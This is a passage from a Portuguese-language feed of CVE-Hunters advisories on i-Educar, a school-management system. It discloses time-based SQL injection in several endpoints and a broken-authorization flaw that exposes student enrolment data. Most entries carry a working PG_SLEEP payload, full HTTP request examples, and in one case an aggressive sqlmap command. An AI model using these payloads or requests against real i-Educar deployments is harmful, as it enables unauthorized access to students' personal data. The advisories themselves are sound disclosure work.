class="cl">Sec-Fetch-Dest: document </span></span><span class="line"><span class="cl">Sec-Fetch-Mode: navigate </span></span><span class="line"><span class="cl">Sec-Fetch-Site: same-origin </span></span><span class="line"><span class="cl">Sec-Fetch-User: ?1 </span></span><span class="line"><span class="cl">Priority: u=0, i </span></span></code></pre></td></tr></table> </div> </div><p style="text-align: justify;">Este payload introduz um atraso de tempo, demonstrando a capacidade de executar consultas SQL arbitrárias.</p> <p><img src="/p/cve-2025-9685/image.png" width="1121" height="1008" srcset="/p/cve-2025-9685/image_hu_9ce46d5757c7b26c.png 480w, /p/cve-2025-9685/image_hu_eb5dd3ebbb1178d3.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="111" data-flex-basis="266px" /></p> <p style="text-align: justify;">Observe o atraso de tempo na resposta do servidor, indicando a execução bem-sucedida do payload SQL.</p> <h2 id="impacto">Impacto </h2><p style="text-align: justify;"> <ul> <li>Acesso não autorizado a dados confidenciais (por exemplo, usuários, senhas, registros).</li> <li>Enumeração de banco de dados (esquemas, tabelas, usuários, versões).</li> <li>Escalonamento para RCE dependendo da configuração do banco de dados (por exemplo, xp_cmdshell, UDFs).</li> <li>Comprometimento total do aplicativo se encadeado com outras vulnerabilidades.</li> <li>Esse problema afeta todos os usuários e ambientes, pois não requer autenticação e pode ser acessado por meio de um ponto de extremidade público.</li> </ul> </p> <h2 id="referência">Referência </h2><p><em><strong><a class="link" href="https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-9685.md" target="_blank" rel="noopener" >https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-9685.md</a></strong></em></p> <h2 id="encontrado-por">Encontrado por </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Sat, 30 Aug 2025 00:00:00 +0000 https://www.cvehunters.com/pt/p/cve-2025-9686/ https://www.cvehunters.com/pt/p/cve-2025-9686/ <h2 id="cve-2025-9686-vulnerabilidade-de-injeção-sql-blind-time-based-no-parâmetro-id-do-endpoint-moduleareaconhecimentoedit">CVE-2025-9686: Vulnerabilidade de Injeção SQL (Blind Time-Based) no parâmetro <code>id</code> do Endpoint <code>/module/AreaConhecimento/edit</code> </h2><blockquote> <p><em>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-9686" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-9686</a></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de injeção SQL foi descoberta no parâmetro <code>id</code> do endpoint <code>/module/AreaConhecimento/edit</code>. Esse problema permite que qualquer invasor não autenticado injete consultas SQL arbitrárias, potencialmente levando a acesso não autorizado aos dados ou exploração adicional, dependendo da configuração do banco de dados.</p> <h2 id="detalhes">Detalhes </h2><p style="text-align: justify;">O aplicativo não consegue sanitizar adequadamente a entrada fornecida pelo usuário no parâmetro <code>id</code>. Como resultado, payloads SQL especialmente criados são interpretados diretamente pelo banco de dados de back-end.</p><h2 id="cve-2025-9686-vulnerabilidade-de-injeção-sql-blind-time-based-no-parâmetro-id-do-endpoint-moduleareaconhecimentoedit">CVE-2025-9686: Vulnerabilidade de Injeção SQL (Blind Time-Based) no parâmetro <code>id</code> do Endpoint <code>/module/AreaConhecimento/edit</code> </h2><blockquote> <p><em>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-9686" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-9686</a></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de injeção SQL foi descoberta no parâmetro <code>id</code> do endpoint <code>/module/AreaConhecimento/edit</code>. Esse problema permite que qualquer invasor não autenticado injete consultas SQL arbitrárias, potencialmente levando a acesso não autorizado aos dados ou exploração adicional, dependendo da configuração do banco de dados.</p> <h2 id="detalhes">Detalhes </h2><p style="text-align: justify;">O aplicativo não consegue sanitizar adequadamente a entrada fornecida pelo usuário no parâmetro <code>id</code>. Como resultado, payloads SQL especialmente criados são interpretados diretamente pelo banco de dados de back-end.</p> <h2 id="poc">PoC </h2><p>Endpoint Vulnerável: <code>/module/AreaConhecimento/edit</code></p> <p>Parâmetro: <code>id</code></p> <h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">'+AND+7097=(SELECT+7097+FROM+PG_SLEEP(5))+AND+'WqeR'='WqeR </span></span></code></pre></td></tr></table> </div> </div><h4 id="exemplo-de-requisição">Exemplo de Requisição </h4><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">POST /module/AreaConhecimento/edit?id=3'+AND+7097=(SELECT+7097+FROM+PG_SLEEP(5))+AND+'WqeR'='WqeR HTTP/1.1 </span></span><span class="line"><span class="cl">Host: localhost </span></span><span class="line"><span class="cl">User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0 </span></span><span class="line"><span class="cl">Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 </span></span><span class="line"><span class="cl">Accept-Language: en-US,en;q=0.5 </span></span><span class="line"><span class="cl">Accept-Encoding: gzip, deflate, br, zstd </span></span><span class="line"><span class="cl">Content-Type: application/x-www-form-urlencoded </span></span><span class="line"><span class="cl">Content-Length: 90 </span></span><span class="line"><span class="cl">Origin: http://localhost </span></span><span class="line"><span class="cl">Connection: keep-alive </span></span><span class="line"><span class="cl">Referer: http://localhost/module/AreaConhecimento/edit?id=3 </span></span><span class="line"><span class="cl">Cookie: grav-admin-flexpages=eyJyb3V0ZSI6Ii9ob21lIiwiZmlsdGVycyI6e319; grav-tabs-state={%22tab--f0e041eed24f87f2b6b02fd6924d0a08%22:%22data.languages%22%2C%22tab-flex-pages-e838602f51515c83bca06a8ae758ce52%22:%22data.security%22%2C%22tab-flex-pages-b6676b27f5cdf6b6c22f8e18da4259a0%22:%22data.advanced%22%2C%22tab-flex-pages-raw-8f0a83a672754f7823714134334b1de8%22:%22data.content%22%2C%22tab-flex-pages-dc26c564cb2116d77bda5fff24ba90dc%22:%22data.security%22%2C%22tab-flex_conf-user_groups-accounts-02f0e9f68f41a0648ed530f80bd72c06%22:%22data.cache%22%2C%22tab-flex-pages-raw-9a0364b9e99bb480dd25e1f0284c8555%22:%22data.content%22%2C%22tab-flex-pages-e91e6348157868de9dd8b25c81aebfb9%22:%22data.security%22%2C%22tab--8cc45760590da203c5fc3568ecbabd66%22:%22data.routes%22%2C%22tab--7a2ac3477f8ad14aa750831441325a16%22:%22data.facebook%22}; i_educar_session=iIw1P9Yxwm9hsXZb74mgDwRm5ltCSdmSQuuURvmG </span></span><span class="line"><span class="cl">Upgrade-Insecure-Requests: 1 </span></span><span class="line"><span class="cl">Sec-Fetch-Dest: document </span></span><span class="line"><span class="cl">Sec-Fetch-Mode: navigate </span></span><span class="line"><span class="cl">Sec-Fetch-Site: same-origin </span></span><span class="line"><span class="cl">Sec-Fetch-User: ?1 </span></span><span class="line"><span class="cl">Priority: u=0, i </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">tipoacao=Editar&id=3&instituicao=1&nome=Educa%C3%A7%C3%A3o+Infantil&secao=&ordenamento_ac= </span></span></code></pre></td></tr></table> </div> </div><p style="text-align: justify;">Este payload introduz um atraso de tempo, demonstrando a capacidade de executar consultas SQL arbitrárias.</p> <p><img src="/p/cve-2025-9686/image.png" width="1123" height="1015" srcset="/p/cve-2025-9686/image_hu_5fdd05e927141c54.png 480w, /p/cve-2025-9686/image_hu_66ab9f29ad1e9d8.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="110" data-flex-basis="265px" /></p> <p style="text-align: justify;">Observe o atraso de tempo na resposta do servidor, indicando a execução bem-sucedida do payload SQL.</p> <h2 id="impacto">Impacto </h2><p style="text-align: justify;"> <ul> <li>Acesso não autorizado a dados confidenciais (por exemplo, usuários, senhas, registros).</li> <li>Enumeração de banco de dados (esquemas, tabelas, usuários, versões).</li> <li>Escalonamento para RCE dependendo da configuração do banco de dados (por exemplo, xp_cmdshell, UDFs).</li> <li>Comprometimento total do aplicativo se encadeado com outras vulnerabilidades.</li> <li>Esse problema afeta todos os usuários e ambientes, pois não requer autenticação e pode ser acessado por meio de um ponto de extremidade público.</li> </ul> </p> <h2 id="referência">Referência </h2><p><em><strong><a class="link" href="https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-9686.md" target="_blank" rel="noopener" >https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-9686.md</a></strong></em></p> <h2 id="encontrado-por">Encontrado por </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Sat, 30 Aug 2025 00:00:00 +0000 https://www.cvehunters.com/pt/p/cve-2025-9687/ https://www.cvehunters.com/pt/p/cve-2025-9687/ <h2 id="cve-2025-9687-broken-object-level-authorization-bola-permite-a-enumeração-de-alunos-via-modulehistoricoescolarprocessamentoapi">CVE-2025-9687: Broken Object Level Authorization (BOLA) permite a enumeração de alunos via <code>/module/HistoricoEscolar/processamentoApi</code> </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-9687" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-9687</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de Broken Object Level Authorization (BOLA) foi identificada no endpoint <code>/module/HistoricoEscolar/processamentoApi</code> do aplicativo i-Educar. Essa falha permite que usuários com poucos privilégios (por exemplo, contas padrão de alunos/responsáveis) recuperem informações de matrícula (<code>matrículas</code>) de alunos fora de seu escopo, expondo Informações Pessoais Identificáveis ​​(PII) sem as devidas verificações de autorização.</p><h2 id="cve-2025-9687-broken-object-level-authorization-bola-permite-a-enumeração-de-alunos-via-modulehistoricoescolarprocessamentoapi">CVE-2025-9687: Broken Object Level Authorization (BOLA) permite a enumeração de alunos via <code>/module/HistoricoEscolar/processamentoApi</code> </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-9687" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-9687</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de Broken Object Level Authorization (BOLA) foi identificada no endpoint <code>/module/HistoricoEscolar/processamentoApi</code> do aplicativo i-Educar. Essa falha permite que usuários com poucos privilégios (por exemplo, contas padrão de alunos/responsáveis) recuperem informações de matrícula (<code>matrículas</code>) de alunos fora de seu escopo, expondo Informações Pessoais Identificáveis ​​(PII) sem as devidas verificações de autorização.</p> <h2 id="detalhes">Detalhes </h2><p style="text-align: justify;"><b>Endpoint Vulnerável:</br></b><code>GET /module/HistoricoEscolar/processamentoApi</code></br></br>O aplicativo não consegue aplicar a <b>autorização em nível de objeto</b> ao manipular este endpoint. Como resultado, qualquer usuário autenticado pode manipular os valores da solicitação para acessar informações confidenciais (nomes, IDs, status de matrícula) dos alunos.</p> <h2 id="poc">PoC </h2><p style="text-align: justify;"><ul><li>Autentique como um usuário sem privilégios (por exemplo, aluno, professor).</li></ul></p> <p><img src="/p/cve-2025-9687/image.png" width="1336" height="537" srcset="/p/cve-2025-9687/image_hu_f939c8d7ab530bb6.png 480w, /p/cve-2025-9687/image_hu_8ff6dd6f967a559d.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="248" data-flex-basis="597px" /></p> <p style="text-align: justify;"><ul><li>Envie a seguinte requisição:</li></ul></p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">GET /module/HistoricoEscolar/processamentoApi?att=matriculas&oper=get&instituicao_id=1&escola_id=4&curso_id=3&serie_id=5&turma_id=23&ano=2025&busca=S HTTP/1.1 </span></span><span class="line"><span class="cl">Cookie: i_educar_session=<low-privileged-session> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-9687/image-1.png" width="1567" height="714" srcset="/p/cve-2025-9687/image-1_hu_226565e8d4a9024e.png 480w, /p/cve-2025-9687/image-1_hu_ac9f38053b5efe51.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="219" data-flex-basis="526px" /></p> <p style="text-align: justify;"><ul><li>Pudemos observar que informações sobre os alunos foram retornadas.</li></ul></p> <h2 id="impacto">Impacto </h2><p style="text-align: justify;">Esta vulnerabilidade é um problema de Broken Object Level Authorization (BOLA) (OWASP API Top 10 - 2023, A01), permitindo a exposição de dados sensíveis. Qualquer usuário autenticado pode acessar informações pessoais de outros usuários. Isso pode levar a: <ul> <li>Acesso não autorizado a PII sensíveis;</li> <li>Violação das leis de proteção de dados (por exemplo, LGPD, GDPR);</li> <li>Possível abuso de dados do usuário ou personificação;</li> <li>Enumeração de usuários.</li> </ul> </p> <h2 id="referência">Referência </h2><p><em><strong><a class="link" href="https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-9687.md" target="_blank" rel="noopener" >https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-9687.md</a></strong></em></p> <h2 id="encontrado-por">Encontrado por </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <blockquote> <p><em><strong>Por: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Sat, 30 Aug 2025 00:00:00 +0000 https://www.cvehunters.com/pt/p/cve-2025-9606/ https://www.cvehunters.com/pt/p/cve-2025-9606/ <h2 id="cve-2025-9606-vulnerabilidade-de-injeção-sql-blind-time-based-no-parâmetro-cod_agenda-do-endpoint-agenda_preferenciasphp">CVE-2025-9606: Vulnerabilidade de Injeção SQL (Blind Time-Based) no parâmetro <code>cod_agenda</code> do Endpoint <code>agenda_preferencias.php</code> </h2><blockquote> <p><em>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-9606" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-9606</a></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de injeção SQL foi descoberta no parâmetro <code>cod_agenda</code> do endpoint <code>agenda_preferencias.php</code>. Esse problema permite que qualquer invasor não autenticado injete consultas SQL arbitrárias, potencialmente levando a acesso não autorizado aos dados ou exploração adicional, dependendo da configuração do banco de dados.</p> <h2 id="detalhes">Detalhes </h2><p style="text-align: justify;">O aplicativo não consegue sanitizar adequadamente a entrada fornecida pelo usuário no parâmetro <code>cod_agenda</code>. Como resultado, payloads SQL especialmente criados são interpretados diretamente pelo banco de dados de back-end.</p><h2 id="cve-2025-9606-vulnerabilidade-de-injeção-sql-blind-time-based-no-parâmetro-cod_agenda-do-endpoint-agenda_preferenciasphp">CVE-2025-9606: Vulnerabilidade de Injeção SQL (Blind Time-Based) no parâmetro <code>cod_agenda</code> do Endpoint <code>agenda_preferencias.php</code> </h2><blockquote> <p><em>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-9606" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-9606</a></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de injeção SQL foi descoberta no parâmetro <code>cod_agenda</code> do endpoint <code>agenda_preferencias.php</code>. Esse problema permite que qualquer invasor não autenticado injete consultas SQL arbitrárias, potencialmente levando a acesso não autorizado aos dados ou exploração adicional, dependendo da configuração do banco de dados.</p> <h2 id="detalhes">Detalhes </h2><p style="text-align: justify;">O aplicativo não consegue sanitizar adequadamente a entrada fornecida pelo usuário no parâmetro <code>cod_agenda</code>. Como resultado, payloads SQL especialmente criados são interpretados diretamente pelo banco de dados de back-end.</p> <h2 id="poc">PoC </h2><p>Endpoint Vulnerável: <code>agenda_preferencias.php</code></p> <p>Parâmetro: <code>cod_agenda</code></p> <h3 id="comando">Comando: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">sqlmap -r req.txt --risk=3 --level=5 --dbs --dbms=PostgreSQL --batch </span></span></code></pre></td></tr></table> </div> </div><h4 id="exemplo-de-requisição">Exemplo de Requisição </h4><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">POST /intranet/agenda_preferencias.php HTTP/1.1 </span></span><span class="line"><span class="cl">Host: localhost </span></span><span class="line"><span class="cl">User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0 </span></span><span class="line"><span class="cl">Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 </span></span><span class="line"><span class="cl">Accept-Language: en-US,en;q=0.5 </span></span><span class="line"><span class="cl">Accept-Encoding: gzip, deflate, br, zstd </span></span><span class="line"><span class="cl">Content-Type: application/x-www-form-urlencoded </span></span><span class="line"><span class="cl">Content-Length: 60 </span></span><span class="line"><span class="cl">Origin: http://localhost </span></span><span class="line"><span class="cl">Connection: keep-alive </span></span><span class="line"><span class="cl">Referer: http://localhost/intranet/agenda_preferencias.php </span></span><span class="line"><span class="cl">Cookie: [COOKIE] </span></span><span class="line"><span class="cl">Upgrade-Insecure-Requests: 1 </span></span><span class="line"><span class="cl">Sec-Fetch-Dest: document </span></span><span class="line"><span class="cl">Sec-Fetch-Mode: navigate </span></span><span class="line"><span class="cl">Sec-Fetch-Site: same-origin </span></span><span class="line"><span class="cl">Sec-Fetch-User: ?1 </span></span><span class="line"><span class="cl">Priority: u=0, i </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">tipoacao=Editar&cod_agenda=2&envia_alerta=0&agenda_display=2 </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-9606/image.png" width="806" height="1023" srcset="/p/cve-2025-9606/image_hu_c74740e10125555c.png 480w, /p/cve-2025-9606/image_hu_f0d4a2c4c2aae934.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="78" data-flex-basis="189px" /></p> <h2 id="impacto">Impacto </h2><p style="text-align: justify;"> <ul> <li>Acesso não autorizado a dados confidenciais (por exemplo, usuários, senhas, registros).</li> <li>Enumeração de banco de dados (esquemas, tabelas, usuários, versões).</li> <li>Escalonamento para RCE dependendo da configuração do banco de dados (por exemplo, xp_cmdshell, UDFs).</li> <li>Comprometimento total do aplicativo se encadeado com outras vulnerabilidades.</li> <li>Esse problema afeta todos os usuários e ambientes, pois não requer autenticação e pode ser acessado por meio de um ponto de extremidade público.</li> </ul> </p> <h2 id="referência">Referência </h2><p><em><strong><a class="link" href="https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-9606.md" target="_blank" rel="noopener" >https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-9606.md</a></strong></em></p> <h2 id="encontrado-por">Encontrado por </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Fri, 29 Aug 2025 00:00:00 +0000 https://www.cvehunters.com/pt/p/cve-2025-9607/ https://www.cvehunters.com/pt/p/cve-2025-9607/ <h2 id="cve-2025-9607-vulnerabilidade-de-injeção-sql-blind-time-based-no-parâmetro-id-do-endpoint-moduletabelaarredondamentoview">CVE-2025-9607: Vulnerabilidade de Injeção SQL (Blind Time-Based) no parâmetro <code>id</code> do Endpoint <code>/module/TabelaArredondamento/view</code> </h2><blockquote> <p><em>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-9607" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-9607</a></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de injeção SQL foi descoberta no parâmetro <code>id</code> do endpoint <code>/module/TabelaArredondamento/view</code>. Esse problema permite que qualquer invasor não autenticado injete consultas SQL arbitrárias, potencialmente levando a acesso não autorizado aos dados ou exploração adicional, dependendo da configuração do banco de dados.</p> <h2 id="detalhes">Detalhes </h2><p style="text-align: justify;">O aplicativo não consegue sanitizar adequadamente a entrada fornecida pelo usuário no parâmetro <code>id</code>. Como resultado, payloads SQL especialmente criados são interpretados diretamente pelo banco de dados de back-end.</p><h2 id="cve-2025-9607-vulnerabilidade-de-injeção-sql-blind-time-based-no-parâmetro-id-do-endpoint-moduletabelaarredondamentoview">CVE-2025-9607: Vulnerabilidade de Injeção SQL (Blind Time-Based) no parâmetro <code>id</code> do Endpoint <code>/module/TabelaArredondamento/view</code> </h2><blockquote> <p><em>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-9607" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-9607</a></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de injeção SQL foi descoberta no parâmetro <code>id</code> do endpoint <code>/module/TabelaArredondamento/view</code>. Esse problema permite que qualquer invasor não autenticado injete consultas SQL arbitrárias, potencialmente levando a acesso não autorizado aos dados ou exploração adicional, dependendo da configuração do banco de dados.</p> <h2 id="detalhes">Detalhes </h2><p style="text-align: justify;">O aplicativo não consegue sanitizar adequadamente a entrada fornecida pelo usuário no parâmetro <code>id</code>. Como resultado, payloads SQL especialmente criados são interpretados diretamente pelo banco de dados de back-end.</p> <h2 id="poc">PoC </h2><p>Endpoint Vulnerável: <code>/module/TabelaArredondamento/view</code></p> <p>Parâmetro: <code>id</code></p> <h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">'+AND+7097=(SELECT+7097+FROM+PG_SLEEP(5))+AND+'WqeR'='WqeR </span></span></code></pre></td></tr></table> </div> </div><h4 id="exemplo-de-requisição">Exemplo de Requisição </h4><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">GET /module/TabelaArredondamento/view?id=1'+AND+7097=(SELECT+7097+FROM+PG_SLEEP(5))+AND+'WqeR'='WqeR HTTP/1.1 </span></span><span class="line"><span class="cl">Host: localhost </span></span><span class="line"><span class="cl">User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0 </span></span><span class="line"><span class="cl">Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 </span></span><span class="line"><span class="cl">Accept-Language: en-US,en;q=0.5 </span></span><span class="line"><span class="cl">Accept-Encoding: gzip, deflate, br, zstd </span></span><span class="line"><span class="cl">Connection: keep-alive </span></span><span class="line"><span class="cl">Referer: http://localhost/module/TabelaArredondamento/index?tipo_nota=1 </span></span><span class="line"><span class="cl">Cookie: [COOKIE] </span></span><span class="line"><span class="cl">Upgrade-Insecure-Requests: 1 </span></span><span class="line"><span class="cl">Sec-Fetch-Dest: document </span></span><span class="line"><span class="cl">Sec-Fetch-Mode: navigate </span></span><span class="line"><span class="cl">Sec-Fetch-Site: same-origin </span></span><span class="line"><span class="cl">Sec-Fetch-User: ?1 </span></span><span class="line"><span class="cl">Priority: u=0, i </span></span></code></pre></td></tr></table> </div> </div><p style="text-align: justify;">Este payload introduz um atraso de tempo, demonstrando a capacidade de executar consultas SQL arbitrárias.</p> <p><img src="/p/cve-2025-9607/image.png" width="1118" height="1020" srcset="/p/cve-2025-9607/image_hu_cf5abac93c459033.png 480w, /p/cve-2025-9607/image_hu_36a33a0596047057.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="109" data-flex-basis="263px" /></p> <p style="text-align: justify;">Observe o atraso de tempo na resposta do servidor, indicando a execução bem-sucedida do payload SQL.</p> <h2 id="impacto">Impacto </h2><p style="text-align: justify;"> <ul> <li>Acesso não autorizado a dados confidenciais (por exemplo, usuários, senhas, registros).</li> <li>Enumeração de banco de dados (esquemas, tabelas, usuários, versões).</li> <li>Escalonamento para RCE dependendo da configuração do banco de dados (por exemplo, xp_cmdshell, UDFs).</li> <li>Comprometimento total do aplicativo se encadeado com outras vulnerabilidades.</li> <li>Esse problema afeta todos os usuários e ambientes, pois não requer autenticação e pode ser acessado por meio de um ponto de extremidade público.</li> </ul> </p> <h2 id="referência">Referência </h2><p><em><strong><a class="link" href="https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-9607.md" target="_blank" rel="noopener" >https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-9607.md</a></strong></em></p> <h2 id="encontrado-por">Encontrado por </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Fri, 29 Aug 2025 00:00:00 +0000 https://www.cvehunters.com/pt/p/cve-2025-9608/ https://www.cvehunters.com/pt/p/cve-2025-9608/ <h2 id="cve-2025-9608-vulnerabilidade-de-injeção-sql-blind-time-based-no-parâmetro-id-do-endpoint-moduleformulamediaview">CVE-2025-9608: Vulnerabilidade de Injeção SQL (Blind Time-Based) no parâmetro <code>id</code> do Endpoint <code>/module/FormulaMedia/view</code> </h2><blockquote> <p><em>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-9608" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-9608</a></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de injeção SQL foi descoberta no parâmetro <code>id</code> do endpoint <code>/module/FormulaMedia/view</code>. Esse problema permite que qualquer invasor não autenticado injete consultas SQL arbitrárias, potencialmente levando a acesso não autorizado aos dados ou exploração adicional, dependendo da configuração do banco 